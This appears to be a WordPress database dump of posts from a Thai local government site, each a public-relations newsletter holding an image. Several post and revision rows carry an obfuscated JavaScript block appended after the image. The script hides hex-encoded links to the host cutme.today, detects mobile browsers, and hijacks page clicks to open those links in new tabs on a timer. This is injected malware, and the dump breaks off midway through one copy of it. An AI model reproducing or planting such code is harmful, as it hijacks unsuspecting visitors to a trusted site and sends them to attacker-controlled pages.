(224,1,'2024-07-27 22:46:13','2024-07-27 15:46:13','<!-- wp:image {\"id\":225,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/12-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-225\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-13','','','2024-07-27 22:46:15','2024-07-27 15:46:15','',0,'http://pakhaeng.ssk.in.th/?p=224',0,'post','',0),
(225,1,'2024-07-27 22:46:04','2024-07-27 15:46:04','','12-2566','','inherit','','closed','','12-2566-2','','','2024-07-27 22:46:04','2024-07-27 15:46:04','',224,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/12-2566-1.png',0,'attachment','image/png',0),
(226,1,'2024-07-27 22:46:13','2024-07-27 15:46:13','<!-- wp:image {\"id\":225,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/12-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-225\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','224-revision-v1','','','2024-07-27 22:46:13','2024-07-27 15:46:13','',224,'http://pakhaeng.ssk.in.th/?p=226',0,'revision','',0),
(227,1,'2024-07-27 22:46:47','2024-07-27 15:46:47','<!-- wp:image {\"id\":228,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/13-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-228\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 